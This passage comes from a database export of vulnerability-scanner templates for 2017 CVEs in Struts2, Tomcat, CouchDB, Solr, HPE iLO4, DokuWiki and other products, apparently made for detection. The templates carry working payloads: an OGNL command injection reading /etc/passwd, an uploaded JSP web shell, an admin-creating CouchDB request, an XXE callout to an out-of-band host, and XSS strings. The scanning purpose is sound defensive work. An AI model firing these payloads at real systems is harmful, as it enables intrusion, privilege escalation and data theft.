cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-11629\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40119\n cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: finecms\n product: finecms\n tags: cve,cve2017,xss,finecms\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'p不存在'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950", "hash": "a54d3f386478bd9924ab126d62a446fb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb7" }, "name": "CVE-2017-12138.yaml", "content": "id: CVE-2017-12138\n\ninfo:\n name: XOOPS Core 2.5.8 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability.\n reference:\n - https://github.com/XOOPS/XoopsCore25/issues/523\n - https://xoops.org\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12138\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-12138\n cwe-id: CWE-601\n epss-score: 0.00062\n epss-percentile: 0.24419\n cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: xoops\n product: xoops\n tags: cve,cve2017,redirect,xoops,authenticated\n\nhttp:\n - raw:\n - |\n POST /user.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n - |\n GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950", "hash": "2ede9ad9c29807334dd082635ce82468", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb8" }, "name": "CVE-2017-12149.yaml", "content": "id: CVE-2017-12149\n\ninfo:\n name: Jboss Application Server - Remote Code Execution\n author: fopina,s0obi\n severity: critical\n description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected server.\n remediation: |\n Apply the latest security patches and updates provided by Jboss to fix this vulnerability.\n reference:\n - https://chowdera.com/2020/12/20201229190934023w.html\n - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12149\n - https://bugzilla.redhat.com/show_bug.cgi?id=1486220\n - https://access.redhat.com/errata/RHSA-2018:1607\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12149\n cwe-id: CWE-502\n epss-score: 0.9719\n epss-percentile: 0.99802\n cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: redhat\n product: jboss_enterprise_application_platform\n tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat\n\nhttp:\n - raw:\n - |\n POST /invoker/JMXInvokerServlet/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/octet-stream\n\n {{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n - |\n POST /invoker/EJBInvokerServlet/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/octet-stream\n\n {{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n - |\n POST /invoker/readonly HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/octet-stream\n\n {{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ClassCastException\n\n - type: status\n status:\n - 200\n - 500\n# digest: 4b0a00483046022100ff07339440ed832558350d4e1909be660a2e00b68ca5777281e9e43e25195d8c022100f8797a6125eb10137f47322fda28c9b9075841e230dd91cacc849802e719af59:922c64590222798bb761d5b6d8e72950", "hash": "8d8cd8bec2584ba8982f71c6f5ba321e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb9" }, "name": "CVE-2017-12542.yaml", "content": "id: CVE-2017-12542\n\ninfo:\n name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass\n author: pikpikcu\n severity: critical\n description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/44005\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12542\n - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us\n - https://www.exploit-db.com/exploits/44005/\n - http://www.securitytracker.com/id/1039222\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2017-12542\n epss-score: 0.97224\n epss-percentile: 0.99822\n cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: integrated_lights-out_4_firmware\n tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rest/v1/AccountService/Accounts\"\n\n headers:\n Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"iLO User\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206f44ac0f4d283c3274421cf7602fe089c97a4031c30a643c870eccb4114bf13e022100929a4cbef7545c9c9dadba9a770a841a2587fad0d188ebffff79a171fcb9cc3b:922c64590222798bb761d5b6d8e72950", "hash": "4ce8e3a8347e0fd55b5e871cb2dfe8f0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fba" }, "name": "CVE-2017-12544.yaml", "content": "id: CVE-2017-12544\n\ninfo:\n name: HPE System Management - Cross-Site Scripting\n author: divya_mudgal\n severity: medium\n description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: |\n Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software.\n reference:\n - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us\n - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12544\n - http://www.securitytracker.com/id/1039437\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2017-12544\n cwe-id: CWE-79\n epss-score: 0.96723\n epss-percentile: 0.99637\n cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: system_management_homepage\n tags: cve,cve2017,xss,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"var prodName = '';prompt`document.domain`;//';\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950", "hash": "09dc5af063df8241e029138846e693ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbb" }, "name": "CVE-2017-12583.yaml", "content": "id: CVE-2017-12583\n\ninfo:\n name: DokuWiki - Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/splitbrain/dokuwiki/issues/2061\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12583\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-12583\n cwe-id: CWE-79\n epss-score: 0.00117\n epss-percentile: 0.44712\n cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dokuwiki\n product: dokuwiki\n shodan-query: http.title:\"DokuWiki\"\n tags: cve,cve2017,xss,dokuwiki\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Unable to parse at parameter \"\".'\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950", "hash": "3538ac2fd684407bb33fcd3d19e92506", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbc" }, "name": "CVE-2017-12611.yaml", "content": "id: CVE-2017-12611\n\ninfo:\n name: Apache Struts2 S2-053 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - https://struts.apache.org/docs/s2-053.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12611\n - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001\n - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-003.txt\n - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12611\n cwe-id: CWE-20\n epss-score: 0.97358\n epss-percentile: 0.99886\n cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2017,apache,rce,struts\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205a7e846889ca9fef021f58b756f7db9e533f0fd2b079699079c49a442f3a817302200cac7efeb08c7927aba913cf747c76517a5bc78708c560f54c0cc97f9bad6598:922c64590222798bb761d5b6d8e72950", "hash": "7e5cfe92798dd473f4f01b2203de6d94", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbd" }, "name": "CVE-2017-12615.yaml", "content": "id: CVE-2017-12615\n\ninfo:\n name: Apache Tomcat Servers - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615\n - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E\n - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12615\n - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-12615\n cwe-id: CWE-434\n epss-score: 0.96878\n epss-percentile: 0.99684\n cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: tomcat\n shodan-query: title:\"Apache Tomcat\"\n tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive\n\nhttp:\n - method: PUT\n path:\n - \"{{BaseURL}}/poc.jsp/\"\n\n body: |\n <%@ page import=\"java.util.*,java.io.*\"%>\n <%\n if (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"
    \");\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n }\n %>\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n - method: GET\n path:\n - \"{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220379d0c5f5c4e19ce0caab699ea5aa078fc15bd35974269774e64b108806b79be0220532d269649aaacb9e369acb9a5d57da778c6df5d4a0afa2976c71e42e63a865c:922c64590222798bb761d5b6d8e72950", "hash": "98b87e13cb8e8a0e55338ec64065e4c0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbe" }, "name": "CVE-2017-12617.yaml", "content": "id: CVE-2017-12617\n\ninfo:\n name: Apache Tomcat - Remote Code Execution\n author: pussycat0x\n severity: high\n description: |\n When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server.\n remediation: |\n Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability.\n reference:\n - https://versa-networks.com/blog/apache-tomcat-remote-code-execution-vulnerability-cve-2017-12617/\n - https://github.com/cyberheartmi9/CVE-2017-12617\n - https://www.exploit-db.com/exploits/43008\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12617\n - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: \"CVE-2017-12617\"\n cwe-id: CWE-434\n epss-score: 0.97533\n epss-percentile: 0.99992\n cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 2\n vendor: apache\n product: tomcat\n shodan-query: html:\"Apache Tomcat\"\n tags: cve2017,cve,tomcat,apache,rce,kev,intrusive\n\nhttp:\n - raw:\n - |\n PUT /{{randstr}}.jsp/ HTTP/1.1\n Host: {{Hostname}}\n\n <% out.println(\"CVE-2017-12617\");%>\n - |\n GET /{{randstr}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"CVE-2017-12617\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950", "hash": "56fa094a8d8c708dfb7ad5b1d0a35b04", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbf" }, "name": "CVE-2017-12629.yaml", "content": "id: CVE-2017-12629\n\ninfo:\n name: Apache Solr <= 7.1 - XML Entity Injection\n author: dwisiswant0\n severity: critical\n description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.\n impact: |\n Successful exploitation of this vulnerability could lead to information disclosure, denial of service.\n remediation: |\n Upgrade to a patched version of Apache Solr (7.2 or higher) or apply the recommended security patches.\n reference:\n - https://twitter.com/honoki/status/1298636315613974532\n - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE\n - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12629\n - http://mail-archives.us.apache.org/mod_mbox/www-announce/201710.mbox/%3CCAOOKt51UO_6Vy%3Dj8W%3Dx1pMbLW9VJfZyFWz7pAnXJC_OAdSZubA%40mail.gmail.com%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12629\n cwe-id: CWE-611\n epss-score: 0.97417\n epss-percentile: 0.99925\n cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: solr\n tags: cve2017,cve,oast,xxe,vulhub,solr,apache\n\nhttp:\n - raw:\n - |\n GET /solr/admin/cores?wt=json HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n extractors:\n - type: regex\n name: core\n group: 1\n regex:\n - '\"name\"\\:\"(.*?)\"'\n internal: true\n# digest: 4b0a00483046022100d4ea117d6f8a9a0bca004f0dd6abfb5a07ccac04c694a225786fb4891966d967022100e00d1081ae2657e9248dc91e946a1ff3d4745375c562b0273a375d31b5fe26c6:922c64590222798bb761d5b6d8e72950", "hash": "c11faa7657273f6c90027862ba85775f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc0" }, "name": "CVE-2017-12635.yaml", "content": "id: CVE-2017-12635\n\ninfo:\n name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation\n author: pikpikcu\n severity: critical\n description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.\n impact: |\n Remote attackers can exploit this vulnerability to escalate privileges.\n remediation: |\n Upgrade Apache CouchDB to version 2.1.1 or later.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12635\n - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E\n - https://security.gentoo.org/glsa/201711-16\n - https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html\n - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12635\n cwe-id: CWE-269\n epss-score: 0.97348\n epss-percentile: 0.99889\n cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: couchdb\n tags: cve2017,cve,couchdb,apache,intrusive\n\nhttp:\n - raw:\n - |\n PUT /_users/org.couchdb.user:poc HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n\n {\n \"type\": \"user\",\n \"name\": \"poc\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"123456\"\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - application/json\n - \"Location:\"\n\n - type: word\n part: body\n words:\n - org.couchdb.user:poc\n - conflict\n - Document update conflict\n\n - type: status\n status:\n - 201\n - 409\n# digest: 4a0a0047304502203addb2b6e215dbff5fb9d55765b537597f5a37384aa1a41b3cdc23deecc6650a022100a8103420fbf062ce4677bc443e076baa92d8b4301fda6d2729268d370c359b60:922c64590222798bb761d5b6d8e72950", "hash": "c5e17a1e4b73228c8aed0d1f12578240", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc1" }, "name": "CVE-2017-12637.yaml", "content": "id: CVE-2017-12637\n\ninfo:\n name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion\n author: apt-mirror\n severity: high\n description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.\n remediation: |\n Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.\n reference:\n - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf\n - https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12637\n - http://www.sh0w.top/index.php/archives/7/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-12637\n cwe-id: CWE-22\n epss-score: 0.00648\n epss-percentile: 0.78875\n cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: netweaver_application_server_java\n shodan-query: http.favicon.hash:-266008933\n tags: cve2017,cve,sap,lfi,java,traversal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"WEB-INF\"\n - \"META-INF\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204718a1f0fc5fb3d6d079a6f410f3203c6081f696613bfb4167a3aedfc56fb25f0221008e2ab021c906aea464f0dacae54694f30f2fa359573d32c35a6dda81f4e2204d:922c64590222798bb761d5b6d8e72950", "hash": "6bcb264d63a025cb810110b5ed428cce", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc2" }, "name": "CVE-2017-12794.yaml", "content": "id: CVE-2017-12794\n\ninfo:\n name: Django Debug Page - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with \"DEBUG = True\" is not on by default (which is what makes the page visible).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project.\n reference:\n - https://twitter.com/sec715/status/1406779605055270914\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12794\n - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/\n - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264\n - http://www.securitytracker.com/id/1039264\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-12794\n cwe-id: CWE-79\n epss-score: 0.00219\n epss-percentile: 